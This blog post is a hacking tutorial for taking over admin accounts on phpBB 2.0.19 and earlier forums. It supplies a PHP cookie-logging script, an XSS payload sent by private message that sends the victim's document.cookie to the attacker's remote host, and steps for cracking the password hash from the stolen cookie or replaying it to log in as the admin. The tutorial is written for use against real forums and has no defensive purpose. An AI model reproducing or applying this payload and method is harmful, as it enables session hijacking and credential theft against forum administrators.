Hacking phpBB 2.0.19 or lower by stealing cookies

Thursday, February 11, 2010 by BBTUNA
Tools needed:
Firefox (http://www.getfirefox.com)
Live HTTP Headers (http://livehttpheaders.mozdev.org/)
A Free Server with PHP (http://www.t35.com)

1 - Make a file with notepad
Insert this code into it:
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('pwnt.txt', 'a'); //chmod 777 lol.txt
fwrite($fp,
'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?>

Save it as lol.php and upload it to your free server at t35.com.

2 - Now find a forum that you want to hack (if you see that html is off by default like in this picture forget it)
http://img167.imageshack.us/img167/2742/ohnoes9sp.th.jpg (http://img167.imageshack.us/my.php?image=ohnoes9sp.jpg)

3 - This is the code you have to pm the admin
' onmouseover='document.location="http://yourdomain.t35.com/lol.php?c="+document.cookie' b='

http://img485.imageshack.us/img485/4752/11403011905622mi5hj.jpg

Change yourdomain to your t35.com site. Change the picture to whatever you want or just leave it. Change lol.php to whatever you named the file you made in step 1.

When the admin puts his mouse over this code it will redirect him to your php file and it will show him a blank screen, you can modify that so it doesnt look so suspicious.

4 - Now find the admin or whoever you want to hack, pm him the code from step 3. Now you will have to wait about a day for him to realize he has a PM.

5 - Once he clicks the message it will make a file in your server called ****.txt, open it.
You will see some code that looks like this:
Xforums_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";s:3:\"320\";}; admin=cXVpeGplc3RlcjozOTIxYzc1YjI5OTI2OGJkODdmNDhl YzhjMjg5YzNmMDplbmdsaXNo; user=MzIwOnViZXJtYWdlOjljZGZiNDM5Yzc4NzZlNzAzZTMwN zg2NGM5MTY3YTE1OjEwOjowOjA6MDowOjo0MDk2; lang=english; eqdkp_data=a:2:{s:13:\"auto_login_id\";s:32:\"3921c75b299268bd87f48ec8c289c3f0\";s:7:\"user_id\";s:1:\"1\";}; Xforums_sid=8e01ff74cfe643a527bdeafc9293a991

A - The easiest way is to copy the password hash which in this case is
3921c75b299268bd87f48ec8c289c3f0
Copy that hash
go to md5.rednoize.com or any other cracker and paste it there, if nothing shows up, you will have to use http headers (in example B) to login as the admin.

B - Go to the forum you hacked, click on tools -> live http headers (assuming you have firefox and http headers installed)

Now refresh the page, at the top of the http headers screen you will see something like this:
http://img190.imageshack.us/img190/310/httpheaders6bg.th.jpg (http://img190.imageshack.us/my.php?image=httpheaders6bg.jpg)

Click on Replay

Delete all the code that comes after
cookie:

Replace it with the code from step 5 that you recieved from your server's log.
Posted in | 0 Comments »

0 comments:

Post a Comment

About Me

Blog Archive